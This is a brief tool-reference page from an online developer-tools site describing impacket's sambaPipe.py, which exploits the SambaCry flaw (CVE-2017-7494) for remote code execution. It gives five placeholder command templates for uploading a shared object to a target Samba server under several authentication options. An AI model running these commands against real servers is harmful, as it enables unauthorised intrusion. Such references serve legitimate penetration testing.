Samba Exploit - RCE with SambaCry | Online Free DevTools by Hexmos
Exploit SambaCry vulnerabilities with sambaPipe.py. Achieve Remote Code Execution (RCE) on vulnerable Samba servers using shared object (SO) files. Free online tool, no registration required.
sambaPipe.py
Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution. More information: https://github.com/fortra/impacket.
- Upload and load a shared object file on a vulnerable Samba server:
sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}
- Authenticate using NTLM hashes instead of a password:
sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}
- Use Kerberos authentication for the target:
sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}
- Specify a domain controller IP for authentication:
sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}
- Use a custom port for the SMB connection:
sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}